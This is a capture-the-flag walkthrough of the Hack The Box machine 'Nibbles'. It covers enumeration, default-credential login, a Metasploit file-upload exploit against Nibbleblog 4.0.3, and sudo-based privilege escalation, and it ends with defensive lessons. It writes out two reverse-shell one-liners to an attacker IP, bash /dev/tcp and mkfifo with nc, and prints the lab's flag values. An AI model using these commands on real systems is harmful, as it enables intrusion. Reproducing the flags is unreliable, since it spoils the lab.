htb-writeups

Nibbles - Hack The Box Walkthrough

Overview

Nibbles is an easy-rated Linux machine from Hack The Box that involves web application enumeration, exploiting a known vulnerability in Nibbleblog CMS, and privilege escalation through misconfigured sudo permissions.

Target IP: 10.129.13.133

Reconnaissance

Initial Port Scan

Started with a comprehensive Nmap scan to identify open ports:

export target=10.129.13.133
sudo nmap -p- --min-rate 5000 -sT -vvv $target

Results:

• Port 22: SSH service
• Port 80: HTTP service

Service Version Detection

Performed detailed service enumeration on discovered ports:

sudo nmap -sC -sV -p 22,80 -T4 $target

Findings:

• Port 22: OpenSSH service
• Port 80: Apache HTTP server

Enumeration

Web Application Discovery

Visiting http://10.129.13.133 revealed a basic webpage. Conducted directory brute-forcing:

gobuster dir -u http://$target -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html -t 50 2>/dev/null

Discovered:

• /nibbleblog/ - Nibbleblog installation directory

Nibbleblog Enumeration

Further enumeration of the Nibbleblog directory:

gobuster dir -u http://$target/nibbleblog/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html -t 50 2>/dev/null

Key Findings:

• /admin/ - Admin directory
• /admin.php - Admin login page

Initial Access

1. Admin Portal Discovery: Accessed http://10.129.13.133/nibbleblog/admin.php
2. Default Credentials: Researched and found default credentials admin:nibbles

1. Successful Login: Gained access to Nibbleblog admin panel
2. Version Identification: Navigated to http://10.129.13.133/nibbleblog/admin.php?controller=settings&action=general revealing Nibbleblog version 4.0.3

Vulnerability Research

searchsploit nibbleblog

Exploits Found:

• Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)

Initial Access

Metasploit Exploitation

sudo msfconsole
msf6 > use exploit/multi/http/nibbleblog_file_upload
msf6 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.129.13.133
msf6 exploit(multi/http/nibbleblog_file_upload) > set LHOST tun0
msf6 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
msf6 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
msf6 exploit(multi/http/nibbleblog_file_upload) > set targeturi /nibbleblog/
msf6 exploit(multi/http/nibbleblog_file_upload) > exploit

Establishing Reverse Shell

Upgraded meterpreter shell to a stable reverse shell:

meterpreter > shell
which bash
/bin/bash
bash -c "bash -i >& /dev/tcp/10.10.14.106/9005 0>&1"

Listener:

nc -nlvp 9005

User Flag

nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cat /home/nibbler/user.txt
efbe7c0779cc99bbecb4cf4d9b5ecc5a

Privilege Escalation

Sudo Privilege Analysis

nibbler@Nibbles:~$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

Exploiting Sudo Misconfiguration

1. Create Directory Structure:

   mkdir -p /home/nibbler/personal/stuff
   

2. Create Malicious Script:

   echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.106 9006 >/tmp/f" > /home/nibbler/personal/stuff/monitor.sh
   

3. Execute with Sudo Privileges:

   sudo /home/nibbler/personal/stuff/monitor.sh
   

Root Shell Listener:

nc -nlvp 9006

Root Flag

# cat /root/root.txt
2e8261585eea5626b6ca3c9668f95fc9

Lessons Learned

Security Misconfigurations

1. Default Credentials: Nibbleblog installation used default credentials
2. Outdated Software: Unpatched Nibbleblog 4.0.3 with known RCE vulnerability
3. Sudo Misconfiguration: User allowed to run specific script as root without password

Attack Vectors

1. Arbitrary File Upload: Exploited via Metasploit module
2. Privilege Escalation: Abused sudo permissions to execute arbitrary commands

Defense Recommendations

1. Change default credentials immediately after installation
2. Keep software updated with latest security patches
3. Implement principle of least privilege for sudo configurations
4. Regular security audits and penetration testing

This walkthrough is for educational purposes only. Always ensure you have proper authorization before conducting security testing.